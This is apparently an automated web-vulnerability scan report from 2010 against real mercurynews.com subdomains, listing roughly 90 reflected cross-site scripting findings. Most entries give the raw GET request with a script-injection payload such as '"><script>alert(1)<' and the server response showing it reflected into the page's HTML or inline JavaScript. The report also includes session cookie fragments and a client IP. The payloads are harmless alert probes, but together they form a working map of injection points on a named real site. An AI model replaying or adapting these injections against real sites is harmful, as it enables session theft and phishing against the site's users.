x
1. Cross-site scripting (reflected)
1.1. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]
1.2. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]
1.3. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]
1.4. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]
1.5. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]
1.6. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]
1.7. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]
1.8. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]
1.9. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]
1.10. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]
1.11. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]
1.13. http://forums.mercurynews.com/forum/news [REST URL parameter 1]
1.14. http://forums.mercurynews.com/forum/news [REST URL parameter 2]
1.15. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]
1.16. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]
1.17. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]
1.18. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]
1.19. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]
1.20. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]
1.21. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]
1.22. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 1]
1.23. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 2]
1.24. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 3]
1.25. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 4]
1.26. http://forums.mercurynews.com/forums/jrss/forum/602/5 [callback parameter]
1.27. http://forums.mercurynews.com/forums/jrss/forum/602/5 [js_param1 parameter]
1.28. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]
1.29. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]
1.30. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 1]
1.31. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 2]
1.32. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 3]
1.33. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 1]
1.34. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 2]
1.35. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 3]
1.36. http://forums.mercurynews.com/poll [REST URL parameter 1]
1.37. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]
1.41. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 1]
1.42. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 2]
1.46. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 1]
1.47. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 2]
1.49. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 1]
1.50. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 2]
1.52. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 1]
1.53. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 2]
1.58. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 1]
1.59. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 2]
1.61. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 1]
1.62. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 2]
1.64. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 1]
1.65. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 2]
1.73. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 1]
1.74. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 2]
1.76. http://forums.mercurynews.com/xml/comments [REST URL parameter 1]
1.77. http://forums.mercurynews.com/xml/comments [REST URL parameter 2]
1.78. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]
1.79. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 1]
1.80. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 2]
1.82. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]
1.83. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]
1.84. https://secure.www.mercurynews.com/registration/ [rPage parameter]
1.85. https://secure.www.mercurynews.com/registration/ [url parameter]
1.86. http://weather.mercurynews.com/cgi-bin/findweather/getForecast [brand parameter]
1.87. http://www.mercurynews.com/mngi/tracking/track [c parameter]
1.88. http://www.mercurynews.com/mngi/tracking/track [n parameter]
1.89. http://www.mercurynews.com/mngi/tracking/track [s parameter]
1.90. http://www.mercurynews.com/mngi/tracking/track [t parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | / |
GET /?8ac11"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 14 Nov 2010 23:11:23 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.122.23.218 X-Runtime: 42 ETag: "2aff5497e3b5794850e Cache-Control: private, max-age=0, must-revalidate Set-Cookie: welcome=6X8sDNEAER Set-Cookie: zvents_tracker_sid Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 73983 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | /movies |
GET /movies?bca30"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Mon, 15 Nov 2010 02:04:53 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.122.23.218 X-Runtime: 23 ETag: "bcb7e2c2be4eec9f2ac Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 48358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | /performers |
GET /performers?aa537"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Mon, 15 Nov 2010 02:05:16 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.122.23.218 X-Runtime: 31 ETag: "9376e5670915f5b3f41 Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 50288 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | /restaurants |
GET /restaurants?33257"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Mon, 15 Nov 2010 02:05:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.122.23.218 X-Runtime: 26 ETag: "4b9a2c25a7455fd486c Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 62158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | /venues |
GET /venues?305e4"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Mon, 15 Nov 2010 02:05:09 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.122.23.218 X-Runtime: 24 ETag: "ae8f296626583360b03 Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 53864 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | / |
GET /?91e58"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:11:57 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb2 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50878 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... pt language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / ?91e58"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/576 |
GET /forum45812"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22096 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum45812"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=get ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/576 |
GET /forum/57679cf3"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16253 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... age="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/57679cf3"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/576 |
GET /forum/576?4beb6"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/business-technology s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/business |
GET /forum6416f"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:23 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22156 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum6416f"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/business |
GET /forum/business Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16333 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/business-technology s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/business |
GET /forum/business Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:10 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/business-technology s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/news |
GET /forumf7ec4"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:38 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22098 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forumf7ec4"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=ge ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/news |
GET /forum/news54941"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:44 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16072 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... ge="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/news54941"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forum/news |
GET /forum/news?c9da1"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:24 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19272 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... e="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forum/news?c9da1"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/602 |
GET /forumsef319"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22112 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... nguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forumsef319"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/602 |
GET /forums/forum%00ef166"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... avaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/forum%00ef166"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=get ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/602 |
GET /forums/forum/602%0087dba"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:39 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... cript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / forums/forum/602%0087dba"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /forums/forum/673 |
